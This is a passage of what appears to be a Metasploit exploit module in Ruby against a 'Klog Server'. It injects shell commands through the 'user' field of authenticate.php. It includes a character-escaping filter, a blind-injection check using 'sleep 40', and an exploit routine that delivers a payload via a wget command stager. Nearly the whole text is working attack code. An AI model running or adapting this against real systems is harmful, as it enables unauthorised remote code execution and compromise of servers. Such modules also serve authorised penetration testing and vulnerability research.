OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']), ] ) end def filter_bad_chars(cmd) cmd.gsub!(/chmod \+x/, 'chmod 777') cmd.gsub!(/;/, " %0A ") cmd.gsub!(/ /, '+') cmd.gsub!(/\//, '%2F') end def execute_command(cmd, opts = {}) command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22" print_status("Sending stager payload...") uri = target_uri.path res= send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'actions', 'authenticate.php'), 'encode_params' => false, 'vars_post' => { 'user' => command_payload, 'pswd' => "inline" } }) if res && res.code == 302 print_error("The target is not vulnerable!") else print_good("The target is vulnerable!") end end def check uri = target_uri.path res= send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'actions', 'authenticate.php'), 'encode_params' => false, 'vars_post' => { 'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep 'pswd' => "inline" } }) if res && res.code == 302 return Exploit::CheckCode::Safe else return Exploit::CheckCode::Vulnerable end end def exploit print_status("Exploiting...") execute_cmdstager(flavor: :wget, delay: 10) end end